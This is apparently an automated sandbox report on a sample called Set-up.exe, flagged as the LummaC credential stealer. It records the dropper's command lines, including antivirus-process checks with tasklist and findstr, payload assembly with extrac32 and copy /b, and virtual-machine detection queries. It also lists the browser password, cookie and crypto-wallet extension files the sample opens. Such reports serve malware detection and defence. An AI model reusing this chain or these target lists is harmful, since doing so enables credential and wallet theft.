      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Set-up.exeStatic file information: File size 73414381 > 1048576
      Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\8429\Functions.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\8429\Functions.comJump to dropped file
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.com TID: 7180Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\8429Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\8429\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tool Tool.cmd & Tool.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 8429Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E MagnificentJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Subsidiary" Sharing Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Facilitate + ..\Girlfriend + ..\Id + ..\Paid + ..\Sensor + ..\Channel + ..\Scroll kJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\8429\Functions.com Functions.com kJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: Functions.com, 0000000B.00000000.1738818456.0000000000173000.00000002.00000001.01000000.00000007.sdmp, Functions.com.1.dr, Contributor.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
